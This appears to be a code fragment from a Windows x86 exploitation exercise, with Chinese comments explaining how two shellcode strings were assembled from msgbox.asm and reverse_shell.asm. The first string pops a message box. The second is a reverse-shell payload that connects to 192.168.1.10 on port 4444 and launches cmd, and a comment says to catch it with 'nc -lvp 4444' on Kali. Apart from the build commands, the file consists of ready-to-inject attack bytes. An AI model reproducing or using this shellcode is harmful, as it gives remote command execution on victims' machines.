//nasm -f win32 msgbox.asm -o msgbox.o
//objdump -d msgbox.o
//hexdump -C msgbox.o
//这个payload是msgbox.asm生成的
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\xcf\x05\x4f\x7c\x51\xff\xd3\xeb\x39"+
"\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\xa9\xe6\x4e\x7c"+
"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51"+
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\x1a\xe0\x4e\x7c\xff\xd0\xe8\xc4\xff"+
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"+
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"+
"\xff\x48\x65\x79\x4e";

//reverse_shell作为一个客户端，在服务端（kali）上用nc -lvp 4444进行监听
//nasm -f win32 reverse_shell.asm -o reverse_shell.o
//objdump -d reverse_shell.o
//hexdump -C reverse_shell.o
//这个payload是reverse_shell.asm生成的
"\xbe\xff\xff\x4d"+
"\x7c\x83\xc6\x01\x89\xf3\x89\xf1\x89\xf2\xbf\xa9\xe6\x4e\x7c\xb8\xcf\x05\x4f"+
"\x7c\x68\x6c\x6c\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x33\x32"+
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\x75\x70\x61\x61\x66"+
"\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53"+
"\x54\x50\xff\xd7\x50\x8d\x34\x24\x68\x74\x41\x61\x61\x66\x81\x6c"+
"\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\x51"+
"\xff\xd7\x89\x46\x04\x68\x65\x63\x74\x61\x83\x6c\x24\x03\x61\x68"+
"\x63\x6f\x6e\x6e\x54\x51\xff\xd7\x89\x46\x08\x68\x73\x41\x61\x61"+
"\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x65\x73\x68\x74\x65\x50"+
"\x72\x68\x43\x72\x65\x61\x54\x53\xff\xd7\x89\x46\x0c\x68\x65\x73"+
"\x73\x61\x83\x6c\x24\x03\x61\x68\x50\x72\x6f\x63\x68\x45\x78\x69"+
"\x74\x54\x53\xff\xd7\x89\x46\x10\x31\xd2\x66\xba\x90\x01\x29\xd4"+
"\x54\x52\xff\x16\x50\x50\x50\x31\xd2\xb2\x06\x52\x40\x50\x40\x50"+
"\xbb\x63\xc9\x03\x75\xff\xd3\x68\xc0\xa8\x01\x0a\x66\x68\x11\x5c\x31\xdb\x80\xc3"+
"\x02\x66\x53\x89\xe2\x6a\x10\x52\x50\x97\xbb\xb9\xc1\x03\x75\xff\xd3\x68\x63\x6d"+
"\x64\x61\x83\x6c\x24\x03\x61\x89\xe2\x57\x57\x57\x31\xdb\x31\xc9"+
"\x80\xc1\x12\x53\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\xc6\x44\x24"+
"\x10\x44\x8d\x44\x24\x10\x54\x50\x53\x53\x53\x43\x53\x4b\x53\x53"+
"\x52\x53\xff\x56\x0c\x53\xff\x56\x10"
